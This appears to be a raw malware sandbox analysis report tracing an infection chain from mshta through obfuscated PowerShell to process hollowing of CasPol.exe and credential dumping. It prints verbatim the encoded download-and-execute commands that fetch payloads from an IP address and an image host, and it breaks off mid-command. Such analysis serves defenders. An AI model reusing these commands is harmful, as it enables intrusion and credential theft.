                      Source: powershell.exe, 00000003.00000002.2164993649.0000000008107000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2163027250.000000000714D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.4497247873.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.4498075941.0000000000DF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: wscript.exe, 00000006.00000003.2134289328.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: powershell.exe, 00000003.00000002.2160140336.0000000004B58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: mshta.exe, 00000000.00000003.2054889053.000000000315B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22
                      Source: wscript.exe, 00000006.00000003.2134289328.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}S
                      Source: powershell.exe, 00000003.00000002.2164993649.00000000080E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!(P~
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_10-54417
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0043A66D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041BCF3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00442564 mov eax, dword ptr fs:[00000030h]10_2_00442564
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_10004AB4 mov eax, dword ptr fs:[00000030h]10_2_10004AB4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,10_2_00410B19
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00434178
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0043A66D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00433B54
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00433CE7 SetUnhandledExceptionFilter,10_2_00433CE7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_100060E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_10002639
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_10002B1C

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: amsi32_7080.amsi.csv, type: OTHER
                      Source: Yara matchFile source: amsi32_7080.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7080, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,10_2_00417245
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: A8B008Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe10_2_00410F36
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00418764 mouse_event,10_2_00418764
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6126.tmp" "c:\Users\user\AppData\Local\Temp\brz1t20s\CSCB0966C08AE0149D5A4EAEA26C81DD572.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnasterJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\vgphuoqzklppcrzcpcvdcumi"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\giuruybtythumfngynhenhzrnto"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\iczknrmumbzhpljkqyugqmuiwagwoan"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\iczknrmumbzhpljkqyugqmuiwagwoan"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jedficagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurklvrzueugicagicagicagicagicagicagicagicagicagicagicaglw1lbwjfcmrfzmluavrjb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5kbewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagieletwtqbkcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiersacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagdhgsdwludcagicagicagicagicagicagicagicagicagicagicagicbtvcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaguufrktsnicagicagicagicagicagicagicagicagicagicagicagic1uqu1licagicagicagicagicagicagicagicagicagicagicagicj6dyigicagicagicagicagicagicagicagicagicagicagicaglw5hbuvzcgfjrsagicagicagicagicagicagicagicagicagicagicagicbkrwfpicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjedfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtiylje1os80ny9lbnrpcmv0aw1lbmvlzgdvb2r0agluz3nmb3jnzxriywnrymvzdhroaw5nc3dpdghnb29kbmv3c2zvci50suyilcikrw5wokfquerbvefczw50axjldgltzw5lzwrnb29kdghpbmdzzm9yz2v0ymfja2jlc3r0agluz3n3axroz29vzg5ldy52ylmildasmck7c3rbunqtu0xlzvaomyk7su52t2tlluvychjlc3njt04gicagicagicagicagicagicagicagicagicagicagicagiirlbly6qvbqrefuqvxlbnrpcmv0aw1lbmvlzgdvb2r0agluz3nmb3jnzxriywnrymvzdhroaw5nc3dpdghnb29kbmv3lnziuyi='+[char]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jedficagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurklvrzueugicagicagicagicagicagicagicagicagicagicagicaglw1lbwjfcmrfzmluavrjb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5kbewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagieletwtqbkcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiersacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagdhgsdwludcagicagicagicagicagicagicagicagicagicagicagicbtvcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaguufrktsnicagicagicagicagicagicagicagicagicagicagicagic1uqu1licagicagicagicagicagicagicagicagicagicagicagicj6dyigicagicagicagicagicagicagicagicagicagicagicaglw5hbuvzcgfjrsagicagicagicagicagicagicagicagicagicagicagicbkrwfpicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjedfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtiylje1os80ny9lbnrpcmv0aw1lbmvlzgdvb2r0agluz3nmb3jnzxriywnrymvzdhroaw5nc3dpdghnb29kbmv3c2zvci50suyilcikrw5wokfquerbvefczw50axjldgltzw5lzwrnb29kdghpbmdzzm9yz2v0ymfja2jlc3r0agluz3n3axroz29vzg5ldy52ylmildasmck7c3rbunqtu0xlzvaomyk7su52t2tlluvychjlc3njt04gicagicagicagicagicagicagicagicagicagicagicagiirlbly6qvbqrefuqvxlbnrpcmv0aw1lbmvlzgdvb2r0agluz3nmb3jnzxriywnrymvzdhroaw5nc3dpdghnb29kbmv3lnziuyi='+[char]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $corythosaurus = 'jgrlc3rvb3igpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskbwfudwzhy3rvcnkgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrpbglvdgliawfsid0gjg1hbnvmywn0b3j5lkrvd25sb2fkrgf0ysgkzgvzdg9vcik7jejlbgxvyya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrpbglvdgliawfsktskbwlzcgvyy2vpdmvzid0gjzw8qkftrty0x1nuqvjupj4noyrvcmjpzm9szca9icc8pejbu0u2nf9ftkq+pic7jgh5c3rlcm9pzca9icrczwxsb2musw5kzxhpzigkbwlzcgvyy2vpdmvzktskywrkaxrpb25hbgl0esa9icrczwxsb2musw5kzxhpzigkb3jiawzvbgqpoyroexn0zxjvawqglwdlidaglwfuzcakywrkaxrpb25hbgl0esatz3qgjgh5c3rlcm9pzdskahlzdgvyb2lkics9icrtaxnwzxjjzwl2zxmutgvuz3rooyr3ywdnaw5zid0gjgfkzgl0aw9uywxpdhkglsakahlzdgvyb2lkoyryzwnyzw1lbnrzid0gjejlbgxvyy5tdwjzdhjpbmcojgh5c3rlcm9pzcwgjhdhz2dpbnmpoyrhzw5ldmegpsatam9pbiaojhjly3jlbwvudhmuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhjly3jlbwvudhmutgvuz3rokv07jgppbgxhcm9vcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojedlbmv2ysk7jhbvbxvtid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkamlsbgfyb29zktskbg93zg93bia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrsb3dkb3dulkludm9rzsgkbnvsbcwgqcgnmc84vjlycs9yl2vllmv0c2fwly86c3b0dggnlcanjglzb21lcmljywxsescsicckaxnvbwvyawnhbgx5jywgjyrpc29tzxjpy2fsbhknlcanq2fzug9sjywgjyrpc29tzxjpy2fsbhknlcanjglzb21lcmljywxsescsjyrpc29tzxjpy2fsbhknlcckaxnvbwvyawnhbgx5jywnjglzb21lcmljywxsescsjyrpc29tzxjpy2fsbhknlcckaxnvbwvyawnhbgx5jywnmscsjyrpc29tzxjpy2fsbhknlccnksk7';$pycnaster = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($corythosaurus));invoke-expression $pycnaster
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jedficagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurklvrzueugicagicagicagicagicagicagicagicagicagicagicaglw1lbwjfcmrfzmluavrjb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5kbewilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagieletwtqbkcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiersacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagdhgsdwludcagicagicagicagicagicagicagicagicagicagicagicbtvcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaguufrktsnicagicagicagicagicagicagicagicagicagicagicagic1uqu1licagicagicagicagicagicagicagicagicagicagicagicj6dyigicagicagicagicagicagicagicagicagicagicagicagl